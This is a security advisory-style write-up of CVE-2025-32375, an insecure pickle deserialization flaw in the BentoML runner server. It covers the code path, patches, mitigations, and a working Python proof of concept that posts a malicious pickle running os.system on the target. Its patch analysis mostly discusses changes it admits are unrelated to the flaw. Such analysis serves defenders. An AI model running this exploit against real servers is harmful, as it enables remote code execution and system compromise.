CVE-2025-32375: Insecure Deserialization in BentoML Runner Server Leads to RCE
Executive Summary
CVE-2025-32375 describes a critical vulnerability in BentoML's runner server, stemming from insecure deserialization. By crafting malicious POST requests with specific headers, an attacker can achieve Remote Code Execution (RCE) on the server. This allows for unauthorized arbitrary code execution, potentially leading to initial access, information disclosure, and complete system compromise. The vulnerability arises from the unsafe use of pickle.loads()
on attacker-controlled data.
Technical Details
Affected Systems:
- BentoML runner server
Affected Software Versions:
- All versions prior to the fix.
Affected Components:
src/bentoml/_internal/server/runner_app.py
src/bentoml/_internal/runner/container.py
src/bentoml/_internal/runner/utils.py
The vulnerability lies within the request handling logic of the BentoML runner server. Specifically, the _deserialize_single_param
function in src/bentoml/_internal/server/runner_app.py
processes request headers such as Payload-Container
, Payload-Meta
, and Batch-Size
, combining them with the request body to construct a Payload
object. This Payload
is then passed through a series of functions, ultimately leading to the execution of pickle.loads()
on the data contained within the request body.
Root Cause Analysis
The root cause of CVE-2025-32375 is the insecure use of Python's pickle.loads()
function. pickle
is a powerful serialization library, but it is inherently unsafe when used to deserialize data from untrusted sources. This is because a malicious pickle stream can contain arbitrary code that will be executed during the deserialization process.
The vulnerability occurs because the Payload-Container
header determines which class's from_payload
method is called. When Payload-Container
is set to NdarrayContainer
or PandasDataFrameContainer
, and payload.meta["format"]
is set to "default"
, the pickle.loads(payload.data)
function is invoked. The payload.data
is directly derived from the request body, which is controlled by the attacker.
Here's a breakdown of the vulnerable code paths:
-
Request Handling: The
_request_handler
function insrc/bentoml/_internal/server/runner_app.py
is responsible for handling incoming requests.# src/bentoml/_internal/server/runner_app.py#L291-L298 async def _request_handler(request: Request) -> Response: assert self._is_ready arg_num = int(request.headers["args-number"]) r_: bytes = await request.body() if arg_num == 1: params: Params[t.Any] = _deserialize_single_param(request, r_)
-
Deserialization: The
_deserialize_single_param
function extracts header values and the request body to create aPayload
object.# src/bentoml/_internal/server/runner_app.py#L376-L393 def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]: container = request.headers["Payload-Container"] meta = json.loads(request.headers["Payload-Meta"]) batch_size = int(request.headers["Batch-Size"]) kwarg_name = request.headers.get("Kwarg-Name") payload = Payload( data=bs, meta=meta, batch_size=batch_size, container=container, ) if kwarg_name: d = {kwarg_name: payload} params: Params[t.Any] = Params(**d) else: params: Params[t.Any] = Params(payload) return params
-
Inference: The
infer
function then processes theparams
object.# src/bentoml/_internal/server/runner_app.py#L303-L304 try: payload = await infer(params)
-
Payload Mapping: Inside
infer
, theparams
object'smap
function is called withAutoContainer.from_payload
.# src/bentoml/_internal/server/runner_app.py#L278-L289 async def infer(params: Params[t.Any]) -> Payload: params = params.map(AutoContainer.from_payload) try: ret = await runner_method.async_run( *params.args, **params.kwargs ) except Exception: traceback.print_exc() raise return AutoContainer.to_payload(ret, 0)
-
Container Selection:
AutoContainer.from_payload
determines the container class based on thePayload-Container
header.# src/bentoml/_internal/runner/container.py#L710-L712 def from_payload(cls, payload: Payload) -> t.Any: container_cls = DataContainerRegistry.find_by_name(payload.container) return container_cls.from_payload(payload)
-
Unsafe Deserialization: Finally, the
from_payload
methods ofNdarrayContainer
andPandasDataFrameContainer
callpickle.loads()
if the"format"
key inpayload.meta
is set to"default"
.# src/bentoml/_internal/runner/container.py#L411-L416 def from_payload( cls, payload: Payload, ) -> ext.PdDataFrame: if payload.meta["format"] == "default": return pickle.loads(payload.data) # src/bentoml/_internal/runner/container.py#L306-L312 def from_payload( cls, payload: Payload, ) -> ext.NpNDArray: format = payload.meta.get("format", "default") if format == "default": return pickle.loads(payload.data)
This direct deserialization of attacker-controlled data without proper sanitization is the core vulnerability.
Patch Analysis
Multiple patches were applied to address the vulnerability and improve the BentoML framework. Here's an analysis of the relevant patches:
-
feat: implement bento arguments (#5299)
This patch introduces the ability to override values of the Image from
bentofile.yaml
and implements bento arguments. While not directly addressing the insecure deserialization, it adds a new feature that could potentially be misused if not handled carefully.File: src/_bentoml_impl/server/serving.py --- a/src/_bentoml_impl/server/serving.py +++ b/src/_bentoml_impl/server/serving.py @@ -92,6 +92,7 @@ def _get_server_socket( _SERVICE_WORKER_SCRIPT = "_bentoml_impl.worker.service" +@inject def create_dependency_watcher( bento_identifier: str, svc: AnyService, @@ -101,6 +102,7 @@ def create_dependency_watcher( scheduler: ResourceAllocator, working_dir: str | None = None, env: dict[str, str] | None = None, + bento_args: dict[str, t.Any] = Provide[BentoMLContainer.bento_arguments], ) -> tuple[Watcher, CircusSocket, str]: from bentoml.serving import create_watcher @@ -116,6 +118,8 @@ def create_dependency_watcher( f"$(circus.sockets.{svc.name})", "--worker-id", "$(CIRCUS.WID)", + "--args", + json.dumps(bento_args), ] if worker_envs: @@ -306,6 +310,7 @@ def serve_http( timeout_graceful_shutdown=timeout_graceful_shutdown, ) timeout_args = ["--timeout", str(timeout)] if timeout else [] + bento_args = BentoMLContainer.bento_arguments.get() server_args = [ "-m", @@ -319,6 +324,8 @@ def serve_http( str(backlog), "--worker-id", "$(CIRCUS.WID)", + "--args", + json.dumps(bento_args), *ssl_args, *timeouts_args, *timeout_args,
This code introduces the concept of
bento_args
, which are arguments passed to the BentoML service. These arguments are serialized as JSON and passed to the worker processes. While JSON serialization is generally safer than pickle, it's important to ensure that these arguments are properly validated and sanitized to prevent other types of vulnerabilities.The
@inject
decorator andProvide[BentoMLContainer.bento_arguments]
indicate that these arguments are managed by the dependency injection system, allowing for flexible configuration and overriding of values. -
fix: remove start commands from CLI (#5303)
This patch removes the
start
commands from the CLI and redirects them to internal modules. This change aims to simplify the CLI and improve the internal structure of BentoML.File: src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh --- a/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh +++ b/src/bentoml/_internal/container/frontend/dockerfile/entrypoint.sh @@ -18,36 +18,39 @@ _main() { # For backwards compatibility with the yatai<1.0.0, adapting the old "yatai" command to the new "start" command. if [ "${#}" -gt 0 ] && [ "${1}" = \'python\' ] && [ "${2}" = \'-m\' ] && { [ "${3}" = \'bentoml._internal.server.cli.runner\' ] || [ "${3}" = "bentoml._internal.server.cli.api_server" ]; }; then # SC2235, use { } to avoid subshell overhead if [ "${3}" = \'bentoml._internal.server.cli.runner\' ]; then - set -- bentoml start-runner-server "${@:4}" + set -- python -m bentoml_cli._internal.start start-runner-server "${@:4}" elif [ "${3}" = \'bentoml._internal.server.cli.api_server\' ]; then - set -- bentoml start-http-server "${@:4}" + set -- python -m bentoml_cli._internal.start start-http-server "${@:4}" fi + # Redirect start-* commands to the internal modules.\n elif [ "${#}" -gt 0 ] && { [ "${1}" = \'start-http-server\' ] || [ "${1}" = \'start-grpc-server\' ] || [ "${1}" = \'start-runner-server\' ]; }; then\n set -- python -m bentoml_cli._internal.start "${@:1}" "$BENTO_PATH"\n # If no arg or first arg looks like a flag.\n elif [[ "$#" -eq 0 ]] || [[ "${1:0:1}" =~ \'-\' ]]; then # This is provided for backwards compatibility with places where user may have # discover this easter egg and use it in their scripts to run the container. if [[ -v BENTOML_SERVE_COMPONENT ]]; then echo "\\$BENTOML_SERVE_COMPONENT is set! Calling \'bentoml start-*\' instead"\n if [ "${BENTOML_SERVE_COMPONENT}" = \'http_server\' ]; then - set -- bentoml start-http-server "$@" "$BENTO_PATH"\ + set -- python -m bentoml_cli._internal.start start-http-server "$@" "$BENTO_PATH"\ elif [ "${BENTOML_SERVE_COMPONENT}" = \'grpc_server\' ]; then - set -- bentoml start-grpc-server "$@" "$BENTO_PATH"\ + set -- python -m bentoml_cli._internal.start start-grpc-server "$@" "$BENTO_PATH"\ elif [ "${BENTOML_SERVE_COMPONENT}" = \'runner\' ]; then - set -- bentoml start-runner-server "$@" "$BENTO_PATH"\ + set -- python -m bentoml_cli._internal.start start-runner-server "$@" "$BENTO_PATH"\ fi else set -- bentoml serve "$@" "$BENTO_PATH"\ fi fi + # Override the BENTOML_PORT if PORT env var is present. Used for Heroku and Yatai.\n if [[ -v PORT ]]; then\n echo "\\$PORT is set! Overriding \\$BENTOML_PORT with \\$PORT ($PORT)"\n export BENTOML_PORT=$PORT\n fi\n # Handle serve and start commands that is passed to the container.\n # Assuming that serve and start commands are the first arguments\n # Note that this is the recommended way going forward to run all bentoml containers.\n - if [ "${#}" -gt 0 ] && { [ "${1}" = \'serve\' ] || [ "${1}" = \'serve-http\' ] || [ "${1}" = \'serve-grpc\' ] || [ "${1}" = \'start-http-server\' ] || [ "${1}" = \'start-grpc-server\' ] || [ "${1}" = \'start-runner-server\' ]; }; then\n + if [ "${#}" -gt 0 ] && { [ "${1}" = \'serve\' ] || [ "${1}" = \'serve-http\' ] || [ "${1}" = \'serve-grpc\' ]; }; then exec bentoml "$@" "$BENTO_PATH"\n else\n # otherwise default to run whatever the command is
This patch doesn't directly address the insecure deserialization vulnerability but changes how the server is started, potentially affecting the attack surface. By redirecting the
start-*
commands to internal modules, the attack surface might be reduced, or at least the entry points for exploitation might change. -
feat: make it possible to override values of Image from bentofile.yaml (#5298)
This patch allows overriding values of the Image from
bentofile.yaml
. This change introduces more flexibility in configuring the BentoML environment but also requires careful validation to prevent malicious configurations.File: src/_bentoml_sdk/images.py --- a/src/_bentoml_sdk/images.py +++ b/src/_bentoml_sdk/images.py @@ -41,7 +41,8 @@ class Image:\n """A class defining the environment requirements for bento."""\n \n- base_image: str\n+ base_image: str = ""\n+ distro: str = "debian"\n python_version: str = DEFAULT_PYTHON_VERSION\n commands: t.List[str] = attrs.field(factory=list)\n lock_python_packages: bool = True\n @@ -243,7 +274,11 @@ def _freeze_python_requirements(\n cwd=bento_fs.getsyspath(py_folder),\n )\n except subprocess.CalledProcessError as e:\n- raise BentoMLException(f"Failed to lock PyPI packages: {e}") from None\n+ raise BentoMLException(\n+ "Failed to lock PyPI packages. Add `--debug` option to see more details.\\n"\n+ "You see this error because you set `lock_packages=true` in the image config.\\n"\n+ "Learn more at https://docs.bentoml.com/en/latest/reference/bentoml/bento-build-options.html#pypi-package-locking"\n+ ) from e\n locked_requirements = ( # uv doesn\'t preserve global option lines, add them here\n "\\n".join(option.dumps() for option in requirements_file.options)\n )\n
This patch modifies the
Image
class to allow setting the base image and distro. It also updates the error message when locking PyPI packages fails, providing more information to the user. While these changes don't directly address the insecure deserialization, they improve the configurability of BentoML and provide better error messages.
Theoretical Fixes:
Given the root cause, the primary fix would involve removing or replacing the insecure pickle.loads()
call. Here are a few potential strategies:
-
Use a Safe Serialization Format: Replace
pickle
with a safer serialization format like JSON or Protocol Buffers. This would require changing theContent-Type
header and the corresponding deserialization logic. -
Input Validation and Sanitization: If
pickle
is necessary for some reason, implement strict input validation and sanitization. This could involve whitelisting allowed classes or data structures and rejecting any input that does not conform to the expected format. -
Sandboxing: Execute the
pickle.loads()
call within a sandboxed environment with limited privileges. This would prevent the attacker from gaining full control of the system even if they are able to execute arbitrary code. -
Authentication and Authorization: Implement robust authentication and authorization mechanisms to ensure that only trusted users can send requests to the runner server.
A theoretical patch to src/bentoml/_internal/runner/container.py
might look like this:
--- a/src/bentoml/_internal/runner/container.py
+++ b/src/bentoml/_internal/runner/container.py
@@ -303,10 +303,13 @@
cls,
payload: Payload,
) -> ext.NpNDArray:
- format = payload.meta.get("format", "default")
- if format == "default":
- return pickle.loads(payload.data)
+ if payload.meta.get("format") == "default":
+ # Replace pickle.loads with a safer alternative, e.g., JSON
+ try:
+ import json
+ return json.loads(payload.data.decode('utf-8'))
+ except json.JSONDecodeError:
+ raise ValueError("Invalid JSON data")
+ else:
+ raise ValueError("Unsupported format")
This theoretical patch replaces pickle.loads
with json.loads
, requiring the client to send JSON-encoded data instead of pickled data. It also adds error handling for invalid JSON data and unsupported formats. This would mitigate the RCE vulnerability by preventing the execution of arbitrary code during deserialization.
Exploitation Techniques
An attacker can exploit CVE-2025-32375 by sending a crafted POST request to the BentoML runner server. The request must include the following headers:
args-number: 1
Content-Type: application/vnd.bentoml.pickled
Payload-Container: NdarrayContainer
(orPandasDataFrameContainer
)Payload-Meta: {"format": "default"}
Batch-Size: -1
The request body should contain a malicious pickle payload that executes arbitrary code.
Here's a step-by-step Proof of Concept (PoC) example:
-
Create a malicious pickle payload:
import pickle import base64 class RCE: def __reduce__(self): import os return (os.system, ('touch /tmp/pwned',)) # Replace with your desired command payload = pickle.dumps(RCE()) payload_b64 = base64.b64encode(payload).decode() print(f"Pickle Payload (Base64 Encoded): {payload_b64}")
This code creates a Python class
RCE
with a__reduce__
method that executes thetouch /tmp/pwned
command. Thepickle.dumps()
function serializes this class into a pickle payload, and thebase64.b64encode()
function encodes it in Base64 for easier transmission. -
Send the crafted POST request:
import requests import base64 url = "http://0.0.0.0:8888/" # Create a malicious pickle payload (same as above) class RCE: def __reduce__(self): import os return (os.system, ('touch /tmp/pwned',)) # Replace with your desired command payload = pickle.dumps(RCE()) headers = { "args-number": "1", "Content-Type": "application/vnd.bentoml.pickled", "Payload-Container": "NdarrayContainer", "Payload-Meta": '{"format": "default"}', "Batch-Size": "-1", } response = requests.post(url, headers=headers, data=payload) print(response.status_code) print(response.content)
This code sends a POST request to the BentoML runner server with the crafted headers and the malicious pickle payload in the request body. If the exploit is successful, the
touch /tmp/pwned
command will be executed on the server, creating a file named/tmp/pwned
.
Attack Scenarios:
- Remote Code Execution: An attacker can execute arbitrary code on the server, potentially gaining full control of the system.
- Information Disclosure: An attacker can access sensitive data stored on the server, such as API keys, database credentials, and customer data.
- Denial of Service: An attacker can crash the server by sending a malicious pickle payload that causes an exception.
- Lateral Movement: If the server is part of a larger network, an attacker can use it as a stepping stone to gain access to other systems.
Real-World Impacts:
- Compromised Machine Learning Models: An attacker could modify or replace machine learning models, leading to incorrect predictions or biased results.
- Data Breach: An attacker could steal sensitive data used by the machine learning models, such as customer data or financial information.
- Supply Chain Attacks: An attacker could inject malicious code into the BentoML deployment pipeline, compromising the entire machine learning supply chain.
Mitigation Strategies
To mitigate CVE-2025-32375, the following strategies are recommended:
-
Upgrade to the latest version of BentoML: Upgrade to a version of BentoML that includes a fix for this vulnerability.
-
Disable or Replace Pickle Deserialization: If possible, disable or replace the use of
pickle.loads()
in the runner server. Use a safer serialization format like JSON or Protocol Buffers instead. -
Input Validation: Implement strict input validation to ensure that only trusted data is deserialized. Whitelist allowed classes or data structures and reject any input that does not conform to the expected format.
-
Network Segmentation: Isolate the BentoML runner server from other systems on the network. This will limit the impact of a successful attack.
-
Least Privilege: Run the BentoML runner server with the least privileges necessary. This will limit the attacker's ability to perform actions on the system.
-
Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests before they reach the BentoML runner server. The WAF can be configured to block requests with suspicious headers or payloads.
-
Regular Security Audits: Conduct regular security audits of the BentoML deployment to identify and address any vulnerabilities.
-
Monitor for Suspicious Activity: Implement monitoring and alerting to detect suspicious activity on the BentoML runner server. This could include unusual network traffic, unexpected process execution, or unauthorized access attempts.
Configuration Changes:
- If using a custom
bentofile.yaml
, ensure that theimage
configuration does not allow for arbitrary base images or distros. - Review and restrict the use of BentoML arguments to prevent malicious configurations.
Security Best Practices:
- Follow the principle of least privilege when configuring the BentoML environment.
- Keep all software components up to date with the latest security patches.
- Implement strong authentication and authorization mechanisms.
- Regularly review and update security policies and procedures.
Timeline of Discovery and Disclosure
- Public Disclosure: CVE-2025-32375 was publicly disclosed.
References
- NVD: (NVD entry will be available after public disclosure)
- GitHub Advisory: https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26
- GitHub Global Advisory: https://github.com/advisories/GHSA-7v4r-c989-xh26
- BentoML Repository: https://github.com/bentoml/BentoML